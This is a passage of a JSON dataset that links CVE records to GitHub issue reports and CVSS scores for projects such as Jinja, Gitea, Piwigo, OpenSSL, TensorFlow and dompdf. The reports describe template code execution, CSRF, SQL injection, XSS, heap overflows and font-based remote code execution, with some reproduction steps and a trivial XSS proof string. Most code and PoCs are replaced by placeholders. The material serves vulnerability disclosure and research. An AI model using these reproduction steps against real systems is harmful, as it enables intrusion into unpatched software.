  90940. "Issue_Url_new": "https://github.com/pallets/jinja/issues/549",
  90941. "Repo_new": "pallets/jinja",
  90942. "Issue_Created_At": "2016-02-23T09:38:45Z",
  90943. "description": "Execute arbitrary codes in template without sandbox environment.. When i use Jinja2 template framework in my project, i found a way to call APITAG or another functions without global register. It's easy to get shell when attacker can control the template content. Is that such a design? APITAG ERRORTAG I test this code with python NUMBERTAG and Jinja NUMBERTAG if it works will print your user's uid...",
  90944. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  90945. "severity": "HIGH",
  90946. "baseScore": 8.8,
  90947. "impactScore": 5.9,
  90948. "exploitabilityScore": 2.8
  90949. },
  90950. {
  90951. "CVE_ID": "CVE-2021-45326",
  90952. "Issue_Url_old": "https://github.com/go-gitea/gitea/issues/4838",
  90953. "Issue_Url_new": "https://github.com/go-gitea/gitea/issues/4838",
  90954. "Repo_new": "go-gitea/gitea",
  90955. "Issue_Created_At": "2018-09-01T00:19:24Z",
  90956. "description": "APITAG CSRF checks on GET routes. The Vulnerabilities on GET Routes For historical reasons some GET routes in Gitea do more than getting info and actually change state, for example /user/logout, and GET routes with action/:action in it. Current CSRF handler only checks POST routes, and thus leaves those GET routes vulnerable. One particular route PATHTAG should probably be a POST i/o GET route. Strategies We are working on a PR to address these vulnerabilities, and would like the community feedback on the best strategy. Option NUMBERTAG reuse existing CSRF token + referrer policy header In this option we will append the existing CSRF token to vulnerable GET routes as a query string, validate the token. A referrer policy header can be set to same origin to prevent abuse of the token. This option has less changes to existing code. Option NUMBERTAG generate a new JWT token with a key exclusive for this purpose In this option we will generate a new JWT token and send to the browser via a new cookie. This will have more changes to the code. Questions security concerns on reusing csrf token on URL We are thinking to implement option NUMBERTAG and have code already done. It has less code changes and hopefully can be merged soon. Are there any concerns on this option NUMBERTAG response code or redirect What should we do if the required token is missing or invalid? Should we redirect to home page, or return NUMBERTAG Browsers treat NUMBERTAG error code differently, for example Chrome on Mac displays the following message which may not be what you want. CODETAG Potential Impact Both options require an extra handler on vulnerable routes to check the token in query string, and minor changes in URL in templates. While the PR can include the new token in default templates, this is potentially a breaking change to people using custom templates. The custom templates need to be updated to include the token in generated URL.",
  90957. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  90958. "severity": "HIGH",
  90959. "baseScore": 8.8,
  90960. "impactScore": 5.9,
  90961. "exploitabilityScore": 2.8
  90962. },
  90963. {
  90964. "CVE_ID": "CVE-2021-45357",
  90965. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1582",
  90966. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1582",
  90967. "Repo_new": "piwigo/piwigo",
  90968. "Issue_Created_At": "2021-12-15T13:48:11Z",
  90969. "description": "FILETAG it just handle GET, POST, COOKIE\uff0cthen we can think whether it can be broken through other parameters Then I found out that piwigo records the user's login and logout process Take the exit process as an APITAG login is also the same)\uff0cin ERRORTAG ERRORTAG After that, let's see what the APITAG function does in ERRORTAG in this APITAG is no filter parameter APITAG FILETAG then execute serialize and pwg_db_real_escape_string functions respectively FILETAG look at APITAG just prevent sql injection ERRORTAG then we register a user APITAG FILETAG then we click logout FILETAG then we just post like this\uff0cIt is best to send more packages FILETAG CODETAG Next, after the system administrator has logged in\uff0cand visit APITAG FILETAG and look it FILETAG",
  90970. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  90971. "severity": "MEDIUM",
  90972. "baseScore": 6.1,
  90973. "impactScore": 2.7,
  90974. "exploitabilityScore": 2.8
  90975. },
  90976. {
  90977. "CVE_ID": "CVE-2021-45864",
  90978. "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/476",
  90979. "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/476",
  90980. "Repo_new": "justdan96/tsmuxer",
  90981. "Issue_Created_At": "2021-10-18T14:12:22Z",
  90982. "description": "segmentation fault in APITAG APITAG Hi, I found a segmentation fault. Some info: APITAG To reproduce NUMBERTAG Compile APITAG NUMBERTAG Run tsmuxer APITAG POC FILETAG ASAN output: ERRORTAG gdb ERRORTAG",
  90983. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  90984. "severity": "MEDIUM",
  90985. "baseScore": 5.5,
  90986. "impactScore": 3.6,
  90987. "exploitabilityScore": 1.8
  90988. },
  90989. {
  90990. "CVE_ID": "CVE-2021-46398",
  90991. "Issue_Url_old": "https://github.com/filebrowser/filebrowser/issues/1621",
  90992. "Issue_Url_new": "https://github.com/filebrowser/filebrowser/issues/1621",
  90993. "Repo_new": "filebrowser/filebrowser",
  90994. "Issue_Created_At": "2021-10-16T16:07:16Z",
  90995. "description": "Security Issue APITAG details and report are not disclosed here). Hi, this is Febin, an Independent security researcher. I have found a critical vulnerability in filebrowser. I reported the vulnerability to EMAILTAG from FILETAG . I also reported a private report on the issue via APITAG Link to the Private Report: URLTAG URLTAG Thanks.",
  90996. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  90997. "severity": "HIGH",
  90998. "baseScore": 8.8,
  90999. "impactScore": 5.9,
  91000. "exploitabilityScore": 2.8
  91001. },
  91002. {
  91003. "CVE_ID": "CVE-2022-0341",
  91004. "Issue_Url_old": "https://github.com/Vanessa219/vditor/issues/1102",
  91005. "Issue_Url_new": "https://github.com/vanessa219/vditor/issues/1102",
  91006. "Repo_new": "vanessa219/vditor",
  91007. "Issue_Created_At": "2021-10-21T10:02:39Z",
  91008. "description": "\u6240\u89c1\u5373\u6240\u5f97\u6a21\u5f0f\u4f20\u5165\u5b57\u7b26\u4e32 APITAG \u62a5\u9519. \u7f16\u8f91\u6a21\u5f0f wysiwyg \u6240\u89c1\u5373\u6240\u5f97\u6a21\u5f0f \u63cf\u8ff0\u95ee\u9898 APITAG APITAG \u65f6\u62a5\u9519 markdown APITAG APITAG ') \u671f\u5f85\u7684\u7ed3\u679c \u4e0d\u62a5\u9519\uff0c\u4ee3\u7801\u6b63\u5e38\u6267\u884c \u622a\u5c4f\u6216\u5f55\u50cf FILETAG \u7248\u672c\u4fe1\u606f \u7248\u672c\uff1a\"vditor\": APITAG \u64cd\u4f5c\u7cfb\u7edf\uff1amacbook pro \u6d4f\u89c8\u5668\uff1a\u8c37\u6b4c",
  91009. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  91010. "severity": "MEDIUM",
  91011. "baseScore": 5.4,
  91012. "impactScore": 2.7,
  91013. "exploitabilityScore": 2.3
  91014. },
  91015. {
  91016. "CVE_ID": "CVE-2022-0764",
  91017. "Issue_Url_old": "https://github.com/strapi/strapi/issues/12879",
  91018. "Issue_Url_new": "https://github.com/strapi/strapi/issues/12879",
  91019. "Repo_new": "strapi/strapi",
  91020. "Issue_Created_At": "2022-03-17T15:16:11Z",
  91021. "description": "NUMBERTAG Fix CVETAG . APITAG Bug report Describe the bug There is a security vulnerability in Strapi that prevents our deployment pipeline from running. There is already a fix implemented for NUMBERTAG but upgrading is not on our short term road map for now. It seems like the fix from NUMBERTAG can be copied to NUMBERTAG on NUMBERTAG but since I've never contributed to this repository I was hoping there was someone willing to back port the fix to NUMBERTAG Other information Vulnerability on APITAG [ CVETAG URLTAG Explanation on APITAG URLTAG Commit to NUMBERTAG that fixes the issue: URLTAG",
  91022. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  91023. "severity": "MEDIUM",
  91024. "baseScore": 6.7,
  91025. "impactScore": 5.9,
  91026. "exploitabilityScore": 0.8
  91027. },
  91028. {
  91029. "CVE_ID": "CVE-2022-1515",
  91030. "Issue_Url_old": "https://github.com/tbeu/matio/issues/186",
  91031. "Issue_Url_new": "https://github.com/tbeu/matio/issues/186",
  91032. "Repo_new": "tbeu/matio",
  91033. "Issue_Created_At": "2022-02-17T16:21:15Z",
  91034. "description": "Memory leaks in APITAG Hi, this is an issue found by fuzzing the current master branch, use the OSS Fuzz harness compiled with APITAG and APITAG to reproduce. The memory leak is in APITAG the reported sanitizer error is the following: ERRORTAG I attach a testcase that trigger the bug in a tar.gz. FILETAG",
  91035. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  91036. "severity": "MEDIUM",
  91037. "baseScore": 5.5,
  91038. "impactScore": 3.6,
  91039. "exploitabilityScore": 1.8
  91040. },
  91041. {
  91042. "CVE_ID": "CVE-2022-2274",
  91043. "Issue_Url_old": "https://github.com/openssl/openssl/issues/18625",
  91044. "Issue_Url_new": "https://github.com/openssl/openssl/issues/18625",
  91045. "Repo_new": "openssl/openssl",
  91046. "Issue_Created_At": "2022-06-22T08:51:51Z",
  91047. "description": "A NUMBERTAG specific heap buffer overflow with NUMBERTAG release. Build APITAG NUMBERTAG on a CPU with A NUMBERTAG my CPU is a Core i NUMBERTAG G7) with: APITAG Run a test: APITAG The sanitizer complains: ERRORTAG",
  91048. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  91049. "severity": "CRITICAL",
  91050. "baseScore": 9.8,
  91051. "impactScore": 5.9,
  91052. "exploitabilityScore": 3.9
  91053. },
  91054. {
  91055. "CVE_ID": "CVE-2022-23562",
  91056. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/52676",
  91057. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/52676",
  91058. "Repo_new": "tensorflow/tensorflow",
  91059. "Issue_Created_At": "2021-10-26T11:38:05Z",
  91060. "description": "Undefined behaviour in Range. APITAG make sure that this is a bug. As per our FILETAG , we only address code/doc bugs, performance issues, feature requests and build/installation issues on APITAG tag:bug_template APITAG System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG all Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: n/a APITAG installed from (source or binary): source APITAG version (use command below): git HEAD Python version NUMBERTAG Bazel version (if compiling from source NUMBERTAG APITAG version (if compiling from source NUMBERTAG APITAG version: n/a GPU model and memory: n/a You can collect some of this information using our environment capture FILETAG You can also obtain the APITAG version with NUMBERTAG TF NUMBERTAG APITAG NUMBERTAG TF NUMBERTAG APITAG Describe the current behavior URLTAG has undefined behaviour when size is greater than APITAG This leads to the unit test APITAG failing on AARCH NUMBERTAG where the g++ implements different behaviour from NUMBERTAG On NUMBERTAG the result of the cast is large and ve, on AARCH NUMBERTAG it is large and +ve. Neither is incorrect as the behaviour of casting into a type that cannot hold the value is undefined. Describe the expected behavior The code should be written to avoid relying on undefined behaviour of the source. Contributing URLTAG Do you want to contribute a PR? (yes/no): yes Briefly describe your candidate solution(if contributing): Test the variable 'size' for exceeding the greatest possible value that can be safely cast to int NUMBERTAG t and throw an error if found. Standalone code to reproduce the issue Provide a reproducible test case that is the bare minimum necessary to generate the problem. If possible, please share a link to PATHTAG notebook. $ bazel test flaky_test_attempts NUMBERTAG test_output=all cache_test_results=no remote_http_cache=\"\" remote_cache_proxy=\"\" noremote_accept_cached config=nonccl verbose_failures PATHTAG Other info / logs Include any logs or source code that would be helpful to diagnose the problem. If including tracebacks, please include the full traceback. Large logs and files should be attached. APITAG ERROR: APITAG APITAG APITAG Traceback (most recent call last): File PATHTAG line NUMBERTAG in APITAG v = APITAG NUMBERTAG e NUMBERTAG limit NUMBERTAG File PATHTAG line NUMBERTAG in error_handler return fn( args, kwargs) File PATHTAG line NUMBERTAG in op_dispatch_handler return dispatch_target( args, kwargs) File PATHTAG line NUMBERTAG in range return APITAG limit, delta, name=name) File PATHTAG line NUMBERTAG in _range APITAG name) File PATHTAG line NUMBERTAG in raise_from_not_ok_status raise APITAG from None pylint: disable=protected access ERRORTAG OOM when allocating tensor with shape NUMBERTAG and type float on PATHTAG by allocator cpu APITAG",
  91061. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  91062. "severity": "HIGH",
  91063. "baseScore": 8.8,
  91064. "impactScore": 5.9,
  91065. "exploitabilityScore": 2.8
  91066. },
  91067. {
  91068. "CVE_ID": "CVE-2022-24191",
  91069. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/470",
  91070. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/470",
  91071. "Repo_new": "michaelrsweet/htmldoc",
  91072. "Issue_Created_At": "2022-01-25T18:17:46Z",
  91073. "description": "Heap Overflow in gif_read_lzw. Due to an infinite loop in the APITAG function, the sp variable which belongs heap memory can be arbitrarily modified. The crash happens in this loop: CODETAG FILETAG As sp is consistently incremented, it reaches out of heap memory which causes the crash: sp towards the start of execution: FILETAG sp once the crash happened: FILETAG You can download and attempt the following POC: APITAG FILETAG",
  91074. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  91075. "severity": "MEDIUM",
  91076. "baseScore": 5.5,
  91077. "impactScore": 3.6,
  91078. "exploitabilityScore": 1.8
  91079. },
  91080. {
  91081. "CVE_ID": "CVE-2022-24859",
  91082. "Issue_Url_old": "https://github.com/py-pdf/PyPDF2/issues/329",
  91083. "Issue_Url_new": "https://github.com/py-pdf/pypdf/issues/329",
  91084. "Repo_new": "py-pdf/pypdf",
  91085. "Issue_Created_At": "2017-02-17T11:55:45Z",
  91086. "description": "Manipulated inline images can force APITAG into an infinite loop. When you try to get the content stream of FILETAG , APITAG will end up in an infinite loop. So this is probably a security issue because it might be possible to denial of service applications using APITAG The reason is that the last while loop in APITAG URLTAG only terminates when it finds the EI token, but never actually checks if the stream has already ended. So it's as simple as adding a (broken) inline image that doesn't have an EI token at all, like the attached PDF. You can see the infinite loop by running this test script with the attached PDF: CODETAG I will soon prepare a pull request that fixes this issue.",
  91087. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  91088. "severity": "MEDIUM",
  91089. "baseScore": 5.5,
  91090. "impactScore": 3.6,
  91091. "exploitabilityScore": 1.8
  91092. },
  91093. {
  91094. "CVE_ID": "CVE-2022-25413",
  91095. "Issue_Url_old": "https://github.com/maxsite/cms/issues/484",
  91096. "Issue_Url_new": "https://github.com/maxsite/cms/issues/484",
  91097. "Repo_new": "maxsite/cms",
  91098. "Issue_Created_At": "2022-02-17T15:24:21Z",
  91099. "description": "Stored Cross Site Scripting (XSS) APITAG NUMBERTAG Stored Cross Site Scripting (XSS)(authenticated) a stored cross site scripting (XSS) in maxsite cms version NUMBERTAG targeted towards web admin through PATHTAG at via the parameter f_tags NUMBERTAG Navigate to admin page, PATHTAG and make a new page NUMBERTAG click in NUMBERTAG insert xss payload APITAG in the parameter f_tags FILETAG NUMBERTAG click save You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time APITAG payload gets executed successfully and we'll get a pop up. FILETAG FILETAG",
  91100. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  91101. "severity": "MEDIUM",
  91102. "baseScore": 5.4,
  91103. "impactScore": 2.7,
  91104. "exploitabilityScore": 2.3
  91105. },
  91106. {
  91107. "CVE_ID": "CVE-2022-25488",
  91108. "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/257",
  91109. "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/257",
  91110. "Repo_new": "thedigicraft/atom.cms",
  91111. "Issue_Created_At": "2022-02-16T14:04:25Z",
  91112. "description": "Unauthorized Sql Injection in PATHTAG . poc ERRORTAG the APITAG output can be found in html source APITAG analysis file PATHTAG line NUMBERTAG without any filter to protect APITAG repair suggestion add some filter about id",
  91113. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  91114. "severity": "CRITICAL",
  91115. "baseScore": 9.8,
  91116. "impactScore": 5.9,
  91117. "exploitabilityScore": 3.9
  91118. },
  91119. {
  91120. "CVE_ID": "CVE-2022-25489",
  91121. "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/258",
  91122. "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/258",
  91123. "Repo_new": "thedigicraft/atom.cms",
  91124. "Issue_Created_At": "2022-02-16T15:32:48Z",
  91125. "description": "Reflected XSS attack in FILETAG with the a parameter in APITAG NUMBERTAG EXPECTED BEHAVIOUR An authenticated malicious user can take advantage of a Reflected XSS vulnerability in FILETAG exp APITAG APITAG analysis FILETAG line NUMBERTAG without any filter. APITAG",
  91126. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  91127. "severity": "MEDIUM",
  91128. "baseScore": 5.4,
  91129. "impactScore": 2.7,
  91130. "exploitabilityScore": 2.3
  91131. },
  91132. {
  91133. "CVE_ID": "CVE-2022-25514",
  91134. "Issue_Url_old": "https://github.com/nothings/stb/issues/1286",
  91135. "Issue_Url_new": "https://github.com/nothings/stb/issues/1286",
  91136. "Repo_new": "nothings/stb",
  91137. "Issue_Created_At": "2022-02-16T15:20:17Z",
  91138. "description": "heap buffer overflow in function APITAG at APITAG . Describe A heap buffer overflow was discovered in stb_truetype. The issue is being triggered in function APITAG at APITAG To Reproduce test program ERRORTAG Compile test program with address sanitizer with this command: APITAG You can get program here URLTAG Asan Reports APITAG Get APITAG reports ERRORTAG Poc Poc file is here URLTAG",
  91139. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  91140. "severity": "HIGH",
  91141. "baseScore": 7.5,
  91142. "impactScore": 3.6,
  91143. "exploitabilityScore": 3.9
  91144. },
  91145. {
  91146. "CVE_ID": "CVE-2022-25515",
  91147. "Issue_Url_old": "https://github.com/nothings/stb/issues/1288",
  91148. "Issue_Url_new": "https://github.com/nothings/stb/issues/1288",
  91149. "Repo_new": "nothings/stb",
  91150. "Issue_Created_At": "2022-02-16T15:32:13Z",
  91151. "description": "heap buffer overflow in function APITAG at APITAG Describe A heap buffer overflow was discovered in stb_truetype. The issue is being triggered in function APITAG at APITAG To Reproduce test program ERRORTAG Compile test program with address sanitizer with this command: APITAG You can get program here URLTAG Asan Reports APITAG Get APITAG reports ERRORTAG Poc Poc file is here URLTAG",
  91152. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  91153. "severity": "MEDIUM",
  91154. "baseScore": 6.5,
  91155. "impactScore": 3.6,
  91156. "exploitabilityScore": 2.8
  91157. },
  91158. {
  91159. "CVE_ID": "CVE-2022-25516",
  91160. "Issue_Url_old": "https://github.com/nothings/stb/issues/1287",
  91161. "Issue_Url_new": "https://github.com/nothings/stb/issues/1287",
  91162. "Repo_new": "nothings/stb",
  91163. "Issue_Created_At": "2022-02-16T15:29:22Z",
  91164. "description": "heap buffer overflow in function stbtt__find_table at APITAG Describe A heap buffer overflow was discovered in stb_truetype. The issue is being triggered in function stbtt__find_table () at APITAG To Reproduce test program ERRORTAG Compile test program with address sanitizer with this command: APITAG You can get program here URLTAG Asan Reports APITAG Get APITAG reports ERRORTAG Poc Poc file is here URLTAG",
  91165. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  91166. "severity": "MEDIUM",
  91167. "baseScore": 6.5,
  91168. "impactScore": 3.6,
  91169. "exploitabilityScore": 2.8
  91170. },
  91171. {
  91172. "CVE_ID": "CVE-2022-26127",
  91173. "Issue_Url_old": "https://github.com/FRRouting/frr/issues/10487",
  91174. "Issue_Url_new": "https://github.com/frrouting/frr/issues/10487",
  91175. "Repo_new": "frrouting/frr",
  91176. "Issue_Created_At": "2022-02-03T02:44:29Z",
  91177. "description": "Miss a check on length in Babel. The code below misses a check on the relationship between packetlen and bodylen before Line NUMBERTAG which may lead to buffer overflows when accessing the memory at Line NUMBERTAG and Line NUMBERTAG URLTAG To fix, we may put the code below before the while loop: ERRORTAG The output of the address sanitizer: ERRORTAG",
  91178. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  91179. "severity": "HIGH",
  91180. "baseScore": 7.8,
  91181. "impactScore": 5.9,
  91182. "exploitabilityScore": 1.8
  91183. },
  91184. {
  91185. "CVE_ID": "CVE-2022-26246",
  91186. "Issue_Url_old": "https://github.com/xiweicheng/tms/issues/15",
  91187. "Issue_Url_new": "https://github.com/xiweicheng/tms/issues/15",
  91188. "Repo_new": "xiweicheng/tms",
  91189. "Issue_Created_At": "2022-02-23T08:11:56Z",
  91190. "description": "There is a cross site scripting vulnerability exists in tms. FILETAG APITAG JS code in the form: APITAG alert (\"XSS\") APITAG FILETAG FILETAG APITAG Save to trigger a pop up window, and the loophole reappearance is completed. FILETAG APITAG cause of the vulnerability is that the input data is not filtered in the foreground page PATHTAG createorupdate, and the input parameters are directly passed into the setting method of APITAG and executed. FILETAG FILETAG",
  91191. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  91192. "severity": "MEDIUM",
  91193. "baseScore": 6.1,
  91194. "impactScore": 2.7,
  91195. "exploitabilityScore": 2.8
  91196. },
  91197. {
  91198. "CVE_ID": "CVE-2022-28049",
  91199. "Issue_Url_old": "https://github.com/nginx/njs/issues/473",
  91200. "Issue_Url_new": "https://github.com/nginx/njs/issues/473",
  91201. "Repo_new": "nginx/njs",
  91202. "Issue_Created_At": "2022-02-17T15:51:14Z",
  91203. "description": "Null pointer dereference in APITAG Hi, this bug was found by fuzzing the current master branch, to reproduce build the OSS Fuzz harness with APITAG and APITAG The bug is a write to a NULL pointer, this is the sanitizer report: ERRORTAG I attach the crashing testcase in a tar.gz, you can run it simply giving the testcase as first argument to the harness. FILETAG",
  91204. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  91205. "severity": "MEDIUM",
  91206. "baseScore": 5.5,
  91207. "impactScore": 3.6,
  91208. "exploitabilityScore": 1.8
  91209. },
  91210. {
  91211. "CVE_ID": "CVE-2022-28368",
  91212. "Issue_Url_old": "https://github.com/dompdf/dompdf/issues/2598",
  91213. "Issue_Url_new": "https://github.com/dompdf/dompdf/issues/2598",
  91214. "Repo_new": "dompdf/dompdf",
  91215. "Issue_Created_At": "2021-10-12T14:16:06Z",
  91216. "description": "Remote code execution vulnerability through persisted font. A malicious user is able to use Dompdf to execute code remotely under the following conditions: the Dompdf font directory ( PATHTAG by default) is accessible through the web a remote user is able to inject CSS into a document rendered by Dompdf On a vulnerable system a user can reference a specially crafted font file that is able to pass the initial parsing process, at which time Dompdf persists the font file to the font directory with an extension matching that of the file on the remote system. At this point the user is able to load the persisted file to execute code within the context of the PHP process. Recommended mitigations for Dompdf versions prior to NUMBERTAG move Dompdf and/or the Dompdf font directory outside the web root disable access to remote resources by setting the APITAG option to false sanitize user input Vulnerability details are available on the Positive Security blog URLTAG . Refer to the wiki for additional information on securing Dompdf URLTAG .",
  91217. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  91218. "severity": "CRITICAL",
  91219. "baseScore": 9.8,
  91220. "impactScore": 5.9,
  91221. "exploitabilityScore": 3.9
  91222. },
  91223. {
  91224. "CVE_ID": "CVE-2022-28990",
  91225. "Issue_Url_old": "https://github.com/wasm3/wasm3/issues/323",
  91226. "Issue_Url_new": "https://github.com/wasm3/wasm3/issues/323",
  91227. "Repo_new": "wasm3/wasm3",
  91228. "Issue_Created_At": "2022-04-07T17:45:08Z",
  91229. "description": "Heap Overflow in WASI read/write API. the WASI API which uses iovs is not check the iovs' buf address and buf length,it would result in out of buffer. run the poc,you will see the memory information leak APITAG If you build with asan,you will see that buffer overflow detected APITAG ./m3 PATHTAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG f3b4c5ce NUMBERTAG e bp NUMBERTAG ffcdce NUMBERTAG sp NUMBERTAG ffcdce NUMBERTAG c8 READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG f3b4c5ce NUMBERTAG d ( PATHTAG ) ............. FILETAG",
  91230. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  91231. "severity": "HIGH",
  91232. "baseScore": 7.8,
  91233. "impactScore": 5.9,
  91234. "exploitabilityScore": 1.8
  91235. },
  91236. {
  91237. "CVE_ID": "CVE-2022-29209",
  91238. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/55530",
  91239. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/55530",
  91240. "Repo_new": "tensorflow/tensorflow",
  91241. "Issue_Created_At": "2022-04-07T13:53:27Z",
  91242. "description": "Test fail on r NUMBERTAG APITAG . APITAG make sure that this is a bug. As per our FILETAG , we only address code/doc bugs, performance issues, feature requests and build/installation issues on APITAG tag:bug_template APITAG System information Have I written custom code (as opposed to using a stock example script provided in APITAG no OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: APITAG installed from (source or binary): source APITAG version (use command below NUMBERTAG ge NUMBERTAG fb9c3ad NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source NUMBERTAG APITAG version (if compiling from source): gcc APITAG NUMBERTAG ubuntu NUMBERTAG APITAG version: N/A GPU model and memory: N/A Describe the current behavior test fails Describe the expected behavior test passes Contributing URLTAG Do you want to contribute a PR? (yes/no): yes Briefly describe your candidate solution(if contributing): This code URLTAG appears to return an aliased/out of scope value when called from URLTAG from (commenting out this line causes the test to pass) URLTAG Evidence for 'aliased/out of scope value' above: the following change in APITAG causes the test to pass: CODETAG But we might prefer either: The above Debug whatever is uint NUMBERTAG specific about URLTAG but I can't see that atm Test on a newer gcc, and deprecate NUMBERTAG if that passes Standalone code to reproduce the issue Provide a reproducible test case that is the bare minimum necessary to generate the problem. If possible, please share a link to PATHTAG notebook. CODETAG Other info / logs Include any logs or source code that would be helpful to diagnose the problem. If including tracebacks, please include the full traceback. Large logs and files should be attached. FILETAG",
  91243. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  91244. "severity": "MEDIUM",
  91245. "baseScore": 5.5,
  91246. "impactScore": 3.6,
  91247. "exploitabilityScore": 1.8
  91248. },
  91249. {
  91250. "CVE_ID": "CVE-2022-29358",
  91251. "Issue_Url_old": "https://github.com/kevinboone/epub2txt2/issues/22",
  91252. "Issue_Url_new": "https://github.com/kevinboone/epub2txt2/issues/22",
  91253. "Repo_new": "kevinboone/epub2txt2",
  91254. "Issue_Created_At": "2022-04-13T15:29:55Z",
  91255. "description": "Integer overflow bug in _parse_special_tag function, sxmlc.c. Hi, there is a integer overflow bug in _parse_special_tag function, sxmlc.c. URLTAG It passes ((len tag >len_start tag >len_end NUMBERTAG sizeof(SXML_CHAR)) as a parameter to malloc function. If (len tag >len_start tag >len_end NUMBERTAG then (len tag >len_start tag >len_end NUMBERTAG It is legal to use NUMBERTAG as an argument to the malloc function, and it will return the address of a small heap successfully. However, in line NUMBERTAG it passes (len tag >len_start tag >len_end) as a parameter to strncpy function NUMBERTAG will be coerced to an unsigned integer NUMBERTAG ffffffffffffffff. It is a huge size and will make the program crashed. poc: FILETAG To reproduce: ERRORTAG The epub2txt is built with: APITAG Tested on: Ubuntu NUMBERTAG",
  91256. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  91257. "severity": "MEDIUM",
  91258. "baseScore": 5.5,
  91259. "impactScore": 3.6,
  91260. "exploitabilityScore": 1.8
  91261. },
  91262. {
  91263. "CVE_ID": "CVE-2022-29362",
  91264. "Issue_Url_old": "https://github.com/SeriaWei/ZKEACMS/issues/457",
  91265. "Issue_Url_new": "https://github.com/seriawei/zkeacms/issues/457",
  91266. "Repo_new": "seriawei/zkeacms",
  91267. "Issue_Created_At": "2022-04-12T02:13:12Z",
  91268. "description": "There is XSS vulnerability that can be able to obtain sensitive user information in the foreground. Reproduction process APITAG in to the back APITAG on the background navigation function. FILETAG APITAG the Add Navigation APITAG xss payload in the header,As shown below. FILETAG APITAG click save and go back to the front page of the cms to trigger the xss vulnerability. FILETAG Restoration suggestions APITAG filters input for pointed brackets. APITAG uses html entity coding output.",
  91269. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  91270. "severity": "MEDIUM",
  91271. "baseScore": 5.4,
  91272. "impactScore": 2.7,
  91273. "exploitabilityScore": 2.3
  91274. },
  91275. {
  91276. "CVE_ID": "CVE-2022-30999",
  91277. "Issue_Url_old": "https://github.com/FriendsOfFlarum/upload/issues/68",
  91278. "Issue_Url_new": "https://github.com/friendsofflarum/upload/issues/68",
  91279. "Repo_new": "friendsofflarum/upload",
  91280. "Issue_Created_At": "2017-04-03T16:38:16Z",
  91281. "description": "uploading SVG images fails. flagrow/upload extension version NUMBERTAG flarum version NUMBERTAG beta NUMBERTAG Upload adapter causing issues: local Uploading SVG images fails when they are opened by the image processor. I didn't test it but looking at the code I guess also uploading any image file other that png, jpeg or gif would fail. I think the following lines should be changed: PATHTAG ERRORTAG PATHTAG ERRORTAG",
  91282. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  91283. "severity": "MEDIUM",
  91284. "baseScore": 5.4,
